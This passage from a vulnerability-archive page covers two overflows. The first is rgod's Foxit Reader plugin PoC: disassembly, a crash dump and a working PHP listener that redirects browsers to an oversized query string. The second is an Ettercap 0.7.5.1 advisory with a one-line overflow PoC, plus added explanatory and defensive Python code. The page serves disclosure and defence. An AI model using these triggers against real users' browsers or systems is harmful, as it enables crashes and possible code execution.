L10001675:
    cmp al,61h
    jl  L100016C6
    cmp al,66h
    jg  L100016C6
L1000167D:
    mov dl,[esi+ebp+01h]
    inc esi
    inc esi
    lea ecx,[esp+10h]
    mov [esp+18h],dl
    push ecx
    mov al,[esi+ebp]
    lea edx,[esp+1Ch]
    push L100450D4
    push edx
    mov [esp+25h],al
    call SUB_L10006421
    mov eax,[esp+1Ch]
    lea ecx,[esp+24h]
    push eax
    push L100450D0
    push ecx
    call SUB_L100063CF
    mov eax,[esp+34h]
    mov dl,[esp+30h]
    add esp,00000018h
    mov [ebx+eax],dl
    jmp L100016CE
L100016C6:
    mov ecx,[esp+1Ch]
    mov byte ptr [ebx+ecx],25h
L100016CE:
    inc ebx
    mov edi,ebp
    or ecx,FFFFFFFFh
    xor eax,eax
    inc esi
    repne scasb
    not ecx
    dec ecx
    cmp esi,ecx
    jl  L1000164A
L100016E4:
    mov edx,[esp+1Ch]
    pop edi
    pop esi
    mov eax,00000001h
    mov byte ptr [ebx+edx],00h
    pop ebx
    pop ebp
    pop ecx
    retn
;------------------------------------------------------------------------------

this copy loop ends up overwriting stack pointers, then (by attaching to
plugin-container.exe):

(f48.1778): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0076ed4c ebx=00000341 ecx=002cf414 edx=002cf414 esi=41414141 edi=0076e9e8
eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
npFoxitReaderPlugin!NP_GetEntryPoints+0x15672:
10016852 8906            mov     dword ptr [esi],eax  ds:0023:41414141=????????
...
Attempt to write to address 41414141
...

also SEH pointers are overwritten
*/

error_reporting(0);
set_time_limit(0);

$port = 6666;

$____redirect = "HTTP/1.1 301 Moved Permanently\r\n".
                "Server: Apache\r\n".
                "Location: /x.pdf?".str_repeat("A",1024)."\r\n".
                "Content-Type: text/html\r\n\r\n";

$____boom     = "HTTP/1.1 200 OK\r\n".
                "Server: Apache\r\n".
                "Accept-Ranges: bytes\r\n".
                "Content-Length: 60137\r\n".
                "Content-Type: application/pdf\r\n".
                "Connection: keep-alive\r\n\r\n";

$socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr);

if (!$socket) {
  echo "$errstr ($errno)\n";
} else {
  echo "Listening on public tcp port ".$port." \n";
  while ($conn = stream_socket_accept($socket)) {
    $line=fgets($conn);
    echo $line."\n";
    if (strpos($line,".pdf")){
      fwrite($conn,$____boom);
    }
    else {
      fwrite($conn,$____redirect);
    }
    fclose($conn);
  }
  fclose($socket);
}
?>
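
To see what the loop at L1000162F does without a browser and a debugger, here is a Python transcription, added here as an example and not part of rgod's PoC. It keeps the three range checks (L10001661 to L10001675) and the two "inc esi" steps from the disassembly. What the two calls SUB_L10006421 and SUB_L100063CF do is not visible on this page, so the model assumes they format the characters after "%" and parse them as hexadecimal, stopping at the first non-hex character; note that the visible code validates only the first character after "%". The bounded variant adds the destination-size check the original lacks, with the buffer size as a parameter because the page does not state it.

```python
# Python transcription of the copy loop at L1000162F-L100016E4 in
# npFoxitReaderPlugin.dll. Assumption: the two helper calls after a valid hex
# lookahead (SUB_L10006421 / SUB_L100063CF) format the two characters following
# '%' and parse them as hex, stopping at the first non-hex character.

PERCENT = 0x25


def _is_hex_digit(c):
    # the three range checks at L10001661..L10001675: '0'-'9', 'A'-'F', 'a'-'f'
    return 0x30 <= c <= 0x39 or 0x41 <= c <= 0x46 or 0x61 <= c <= 0x66


def _decode(src, out_size=None):
    """Decode src the way the plugin does. With out_size=None nothing bounds the
    output index (ebx), exactly like the original; with out_size set, the
    function returns None before the first byte that would not fit, keeping one
    byte for the terminator the original writes at L100016E4."""
    out = bytearray()
    i, n = 0, len(src)
    while i < n:
        if out_size is not None and len(out) + 1 >= out_size:
            return None                     # the check the original lacks
        c = src[i]
        # In C the lookahead at end of string reads the NUL, which fails the hex
        # test, so the "i + 1 < n" guard is equivalent to the original.
        if c == PERCENT and i + 1 < n and _is_hex_digit(src[i + 1]):
            hi = src[i + 1]
            lo = src[i + 2] if i + 2 < n else 0
            # assumption: the hex parse stops at the first non-hex character
            digits = bytes([hi]) + (bytes([lo]) if _is_hex_digit(lo) else b"")
            out.append(int(digits.decode("ascii"), 16) & 0xFF)
            i += 3          # "inc esi" twice in the branch, once at L100016CE
        else:
            out.append(c)   # plain byte, or a lone '%' (L100016C6 stores 25h)
            i += 1
    return bytes(out)


def foxit_decode(src):
    """Unbounded variant, as shipped: output length tracks input length."""
    return _decode(src)


def bounded_decode(src, out_size):
    """Hardened variant: same logic, but the destination size is honoured."""
    return _decode(src, out_size)


def poc_query(n=1024):
    """The query string the listener above redirects to: /x.pdf?AAAA... (n bytes)."""
    return b"A" * n
```

Because nothing in the loop relates ebx to the size of the buffer at [esp+1Ch], a 1024-byte query string produces 1024 bytes of output plus a terminator; the `esi=41414141` in the crash dump is that output running over saved registers on the stack.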

 

Ettercap 0.7.5.1 Stack Overflow Vulnerability

An Ettercap 0.7.5.1 stack overflow vulnerability has been found; the exploit and description of the vulnerability are given below.

 


Title: Ettercap Stack overflow (CWE-121)
References: CVE-2012-0722
Discovered by: Sajjad Pourali
Vendor: http://www.ettercap.sourceforge.net/
Vendor contact: 13-01-01 21:20 UTC (No response)
Solution: Using the patch
Patch: http://www.securation.com/files/2013/01/ec.patch

Local: Yes
Remote: No
Impact: low

Affected:
 - ettercap 0.7.5.1
 - ettercap 0.7.5
 - ettercap 0.7.4 and earlier
Not affected:
 - ettercap 0.7.4.1

---

Trace vulnerable place:

./include/ec_inet.h:27-44
enum {
   NS_IN6ADDRSZ            = 16,
   NS_INT16SZ              = 2,

   ETH_ADDR_LEN            = 6,
   TR_ADDR_LEN             = 6,
   FDDI_ADDR_LEN           = 6,
   MEDIA_ADDR_LEN          = 6,

   IP_ADDR_LEN             = 4,
   IP6_ADDR_LEN            = 16,
   MAX_IP_ADDR_LEN         = IP6_ADDR_LEN,

   ETH_ASCII_ADDR_LEN      = sizeof("ff:ff:ff:ff:ff:ff")+1,
   IP_ASCII_ADDR_LEN       = sizeof("255.255.255.255")+1,
   IP6_ASCII_ADDR_LEN      = sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1,
   MAX_ASCII_ADDR_LEN      = IP6_ASCII_ADDR_LEN,
};

./include/ec_resolv.h:42
#define MAX_HOSTNAME_LEN   64

./src/ec_scan.c:610-614
char ip[MAX_ASCII_ADDR_LEN];
char mac[ETH_ASCII_ADDR_LEN];
char name[MAX_HOSTNAME_LEN];

./src/ec_scan.c:633-635
if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 ||
         *ip == '#' || *mac == '#' || *name == '#')
         continue;

---

PoC:

sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow
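
A hosts file handed to -j is read with unbounded %s conversions, so the only check available on an unpatched build is on the file before ettercap opens it. The following lint, added here as an example and not part of the advisory or of ettercap, recomputes the buffer sizes from the ec_inet.h and ec_resolv.h excerpts above and reports every token that would not fit the buffer fscanf() copies it into. The sample inputs in the test are constructed.

```python
"""Pre-flight check for an ettercap -j hosts file against the buffer sizes in
the ec_inet.h / ec_resolv.h excerpts above: fscanf("%s ...") writes the whole
token plus a NUL, so any token of length >= its buffer size overflows."""

import sys


def _sizeof(literal):
    # C sizeof on a string literal counts the terminating NUL
    return len(literal) + 1


ETH_ASCII_ADDR_LEN = _sizeof("ff:ff:ff:ff:ff:ff") + 1                              # 19
IP_ASCII_ADDR_LEN = _sizeof("255.255.255.255") + 1                                 # 17
IP6_ASCII_ADDR_LEN = _sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255") + 1  # 47
MAX_ASCII_ADDR_LEN = IP6_ASCII_ADDR_LEN
MAX_HOSTNAME_LEN = 64

# destination buffers in the order the fscanf() call in ec_scan.c fills them
FIELDS = (("ip", MAX_ASCII_ADDR_LEN),
          ("mac", ETH_ASCII_ADDR_LEN),
          ("name", MAX_HOSTNAME_LEN))


def fscanf_tokens(text):
    """%s skips any whitespace, newlines included, so fscanf sees the file as
    one stream of tokens and does not care where the line breaks are."""
    return text.split()


def check_hosts_file(text):
    """Return (token_index, field, token_length, buffer_size) for every token
    that would not fit: strlen + 1 > sizeof(buffer). The '#' comment test in
    ec_scan.c runs after fscanf has already copied, so it protects nothing."""
    findings = []
    for idx, tok in enumerate(fscanf_tokens(text)):
        field, size = FIELDS[idx % len(FIELDS)]
        if len(tok) + 1 > size:
            findings.append((idx, field, len(tok), size))
    return findings


if __name__ == "__main__":
    with open(sys.argv[1], encoding="latin-1") as f:
        for idx, field, length, size in check_hosts_file(f.read()):
            print("token %d -> %s[%d]: %d bytes, overflows" % (idx, field, size, length))
```

On the C side the usual fix is a field width on each conversion one less than its buffer (46, 18 and 63 here) and a check on the return value; whether the linked ec.patch does exactly that is not shown on this page.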

---

+ Sajjad Pourali
+ http://www.securation.com
+ Contact: sajjad[at]securation.com